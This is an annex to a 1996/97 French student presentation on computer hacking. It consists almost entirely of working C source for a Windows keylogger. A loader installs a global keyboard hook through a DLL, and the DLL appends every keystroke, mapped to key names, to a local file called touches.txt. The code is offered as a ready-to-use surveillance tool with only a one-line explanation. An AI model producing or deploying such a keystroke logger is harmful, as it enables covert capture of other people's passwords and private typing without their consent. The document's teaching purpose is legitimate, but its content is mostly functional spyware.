EMN cours Reseaux - expose piratage : Annexe: Interception des évènements clavier

Exposés des élèves du cours de deuxième année de l'Ecole des Mines de Nancy RESEAUX 1996/1997
Le piratage informatique, par Steve JENESTE, Gilles LACROIX et François SCHMITT

Annexe: interception des évènements-clavier

Le programme suivant charge une DLL (librairie dynamique) et indique à Windows qu'il doit appeler cette DLL lorsqu'une touche du clavier a été enfoncée.

#include <windows.h> int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR pszCmdLine, int nCmdShow) { HOOKPROC hkprcSysMsg; static HINSTANCE hinstDLL; static HHOOK hhookSysMsg;

/* chargement de la DLL */ hinstDLL = LoadLibrary((LPCTSTR) "kbdmsg.dll");

/* recuperation de l'adresse de la fonction KeyboardProc de la DLL */ hkprcSysMsg = (HOOKPROC)GetProcAddress(hinstDLL, "KeyboardProc");

/* attachement de la fonction aux evenements-clavier */ hhookSysMsg = SetWindowsHookEx(WH_KEYBOARD,hkprcSysMsg, hinstDLL, 0); /* boucle infinie, pour que la DLL reste active */

while (1) ; return 0; }

La DLL chargée par le programme précédent peut avoir la forme suivante :

#include <windows.h> #include <stdio.h> HHOOK hhookSysMsg; LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam) { FILE *fp; static int c = 0;

/* fichier servant au stockage des frappes au clavier */ fp=fopen("touches.txt","a+");

if (nCode < 0) /* ne pas traiter le message */ return CallNextHookEx(hhookSysMsg, nCode, wParam, lParam);

/* wParam contient le Virtual Key Code de la touche */ switch(wParam) { case(VK_RETURN): fprintf(fp, "%d:\tvk: %d [Return] \n", c++,wParam); break; case(VK_BACK): fprintf(fp, "%d:\tvk: %d [Back] \n", c++,wParam); break; case(VK_TAB): fprintf(fp, "%d:\tvk: %d [Tab] \n", c++,wParam); break; case(VK_SHIFT): fprintf(fp, "%d:\tvk: %d [Shift] \n", c++,wParam); break; case(VK_MENU): fprintf(fp, "%d:\tvk: %d [Alt] \n", c++,wParam); break; case(VK_CONTROL): fprintf(fp, "%d:\tvk: %d [Ctrl] \n", c++,wParam); break; case(VK_SPACE): fprintf(fp, "%d:\tvk: %d [Space] \n", c++,wParam); break; case(VK_CAPITAL): fprintf(fp, "%d:\tvk: %d [CapsLock] \n", c++,wParam); break; case(VK_ESCAPE): fprintf(fp, "%d:\tvk: %d [Escape] \n", c++,wParam); break; case(VK_PRIOR): fprintf(fp, "%d:\tvk: %d [PgUp] \n", c++,wParam); break; case(VK_NEXT): fprintf(fp, "%d:\tvk: %d [PgDn] \n", c++,wParam); break; case(VK_UP): fprintf(fp, "%d:\tvk: %d [Up] \n", c++,wParam); break; case(VK_DOWN): fprintf(fp, "%d:\tvk: %d [Down] \n", c++,wParam); break; case(VK_LEFT): fprintf(fp, "%d:\tvk: %d [Left] \n", c++,wParam); break; case(VK_RIGHT): fprintf(fp, "%d:\tvk: %d [Right] \n", c++,wParam); break; case(VK_INSERT): fprintf(fp, "%d:\tvk: %d [Inser] \n", c++,wParam); break; case(VK_HOME): fprintf(fp, "%d:\tvk: %d [Home] \n", c++,wParam); break; case(VK_DELETE): fprintf(fp, "%d:\tvk: %d [Suppr] \n", c++,wParam); break; case(VK_END): fprintf(fp, "%d:\tvk: %d [Fin] \n", c++,wParam); break; case(VK_NUMLOCK): fprintf(fp, "%d:\tvk: %d [VerrNum] \n", c++,wParam); break; case(VK_F1): fprintf(fp, "%d:\tvk: %d [F1] \n", c++,wParam); break; case(VK_F2): fprintf(fp, "%d:\tvk: %d [F2] \n", c++,wParam); break; case(VK_F3): fprintf(fp, "%d:\tvk: %d [F3] \n", c++,wParam); break; case(VK_F4): fprintf(fp, "%d:\tvk: %d [F4] \n", c++,wParam); break; case(VK_F5): fprintf(fp, "%d:\tvk: %d [F5] \n", c++,wParam); break; case(VK_F6): fprintf(fp, "%d:\tvk: %d [F6] \n", c++,wParam); break; case(VK_F7): fprintf(fp, "%d:\tvk: %d [F7] \n", c++,wParam); break; case(VK_F8): fprintf(fp, "%d:\tvk: %d [F8] \n", c++,wParam); break; case(VK_F9): fprintf(fp, "%d:\tvk: %d [F9] \n", c++,wParam); break; case(VK_F10): fprintf(fp, "%d:\tvk: %d [F10] \n", c++,wParam); break; case(VK_F11): fprintf(fp, "%d:\tvk: %d [F11] \n", c++,wParam); break; case(VK_F12): fprintf(fp, "%d:\tvk: %d [F12] \n", c++,wParam); break; case('A'): fprintf(fp, "%d:\tvk: %d [A] \n", c++,wParam); break; case('B'): fprintf(fp, "%d:\tvk: %d [B] \n", c++,wParam); break; case('C'): fprintf(fp, "%d:\tvk: %d [C] \n", c++,wParam); break; case('D'): fprintf(fp, "%d:\tvk: %d [D] \n", c++,wParam); break; case('E'): fprintf(fp, "%d:\tvk: %d [E] \n", c++,wParam); break; case('F'): fprintf(fp, "%d:\tvk: %d [F] \n", c++,wParam); break; case('G'): fprintf(fp, "%d:\tvk: %d [G] \n", c++,wParam); break; case('H'): fprintf(fp, "%d:\tvk: %d [H] \n", c++,wParam); break; case('I'): fprintf(fp, "%d:\tvk: %d [I] \n", c++,wParam); break; case('J'): fprintf(fp, "%d:\tvk: %d [J] \n", c++,wParam); break; case('K'): fprintf(fp, "%d:\tvk: %d [K] \n", c++,wParam); break; case('L'): fprintf(fp, "%d:\tvk: %d [L] \n", c++,wParam); break; case('M'): fprintf(fp, "%d:\tvk: %d [M] \n", c++,wParam); break; case('N'): fprintf(fp, "%d:\tvk: %d [N] \n", c++,wParam); break; case('O'): fprintf(fp, "%d:\tvk: %d [O] \n", c++,wParam); break; case('P'): fprintf(fp, "%d:\tvk: %d [P] \n", c++,wParam); break; case('Q'): fprintf(fp, "%d:\tvk: %d [Q] \n", c++,wParam); break; case('R'): fprintf(fp, "%d:\tvk: %d [R] \n", c++,wParam); break; case('S'): fprintf(fp, "%d:\tvk: %d [S] \n", c++,wParam); break; case('T'): fprintf(fp, "%d:\tvk: %d [T] \n", c++,wParam); break; case('U'): fprintf(fp, "%d:\tvk: %d [U] \n", c++,wParam); break; case('V'): fprintf(fp, "%d:\tvk: %d [V] \n", c++,wParam); break; case('W'): fprintf(fp, "%d:\tvk: %d [W] \n", c++,wParam); break; case('X'): fprintf(fp, "%d:\tvk: %d [X] \n", c++,wParam); break; case('Y'): fprintf(fp, "%d:\tvk: %d [Y] \n", c++,wParam); break; case('Z'): fprintf(fp, "%d:\tvk: %d [Z] \n", c++,wParam); break; case('0'): fprintf(fp, "%d:\tvk: %d [0] \n", c++,wParam); break; case('1'): fprintf(fp, "%d:\tvk: %d [1] \n", c++,wParam); break; case('2'): fprintf(fp, "%d:\tvk: %d [2] \n", c++,wParam); break; case('3'): fprintf(fp, "%d:\tvk: %d [3] \n", c++,wParam); break; case('4'): fprintf(fp, "%d:\tvk: %d [4] \n", c++,wParam); break; case('5'): fprintf(fp, "%d:\tvk: %d [5] \n", c++,wParam); break; case('6'): fprintf(fp, "%d:\tvk: %d [6] \n", c++,wParam); break; case('7'): fprintf(fp, "%d:\tvk: %d [7] \n", c++,wParam); break; case('8'): fprintf(fp, "%d:\tvk: %d [8] \n", c++,wParam); break; case('9'): fprintf(fp, "%d:\tvk: %d [9] \n", c++,wParam); break; case(VK_NUMPAD0): fprintf(fp, "%d:\tvk: %d [Num0] \n", c++,wParam); break; case(VK_NUMPAD1): fprintf(fp, "%d:\tvk: %d [Num1] \n", c++,wParam); break; case(VK_NUMPAD2): fprintf(fp, "%d:\tvk: %d [Num2] \n", c++,wParam); break; case(VK_NUMPAD3): fprintf(fp, "%d:\tvk: %d [Num3] \n", c++,wParam); break; case(VK_NUMPAD4): fprintf(fp, "%d:\tvk: %d [Num4] \n", c++,wParam); break; case(VK_NUMPAD5): fprintf(fp, "%d:\tvk: %d [Num5] \n", c++,wParam); break; case(VK_NUMPAD6): fprintf(fp, "%d:\tvk: %d [Num6] \n", c++,wParam); break; case(VK_NUMPAD7): fprintf(fp, "%d:\tvk: %d [Num7] \n", c++,wParam); break; case(VK_NUMPAD8): fprintf(fp, "%d:\tvk: %d [Num8] \n", c++,wParam); break; case(VK_NUMPAD9): fprintf(fp, "%d:\tvk: %d [Num9] \n", c++,wParam); break; case(VK_ADD): fprintf(fp, "%d:\tvk: %d [Num+] \n", c++,wParam); break; case(VK_SUBTRACT): fprintf(fp, "%d:\tvk: %d [Num-] \n", c++,wParam); break; case(VK_MULTIPLY): fprintf(fp, "%d:\tvk: %d [Num*] \n", c++,wParam); break; case(VK_DIVIDE): fprintf(fp, "%d:\tvk: %d [Num/] \n", c++,wParam); break; case(VK_DECIMAL): fprintf(fp, "%d:\tvk: %d [Num.] \n", c++,wParam); break; case(188): fprintf(fp, "%d:\tvk: %d [,] \n", c++,wParam); break; case(190): fprintf(fp, "%d:\tvk: %d [;] \n", c++,wParam); break; case(191): fprintf(fp, "%d:\tvk: %d [:] \n", c++,wParam); break; case(223): fprintf(fp, "%d:\tvk: %d [!] \n", c++,wParam); break; case(226): fprintf(fp, "%d:\tvk: %d [<] \n", c++,wParam); break; case(192): fprintf(fp, "%d:\tvk: %d [ù] \n", c++,wParam); break; case(220): fprintf(fp, "%d:\tvk: %d [*] \n", c++,wParam); break; case(186): fprintf(fp, "%d:\tvk: %d [$] \n", c++,wParam); break; case(221): fprintf(fp, "%d:\tvk: %d [^] \n", c++,wParam); break; case(219): fprintf(fp, "%d:\tvk: %d [)] \n", c++,wParam); break; case(187): fprintf(fp, "%d:\tvk: %d [=] \n", c++,wParam); break; default: fprintf(fp, "%d:\tvk: %d [???] \n", c++,wParam); }

fclose(fp);

return CallNextHookEx(hhookSysMsg, nCode, wParam,lParam); }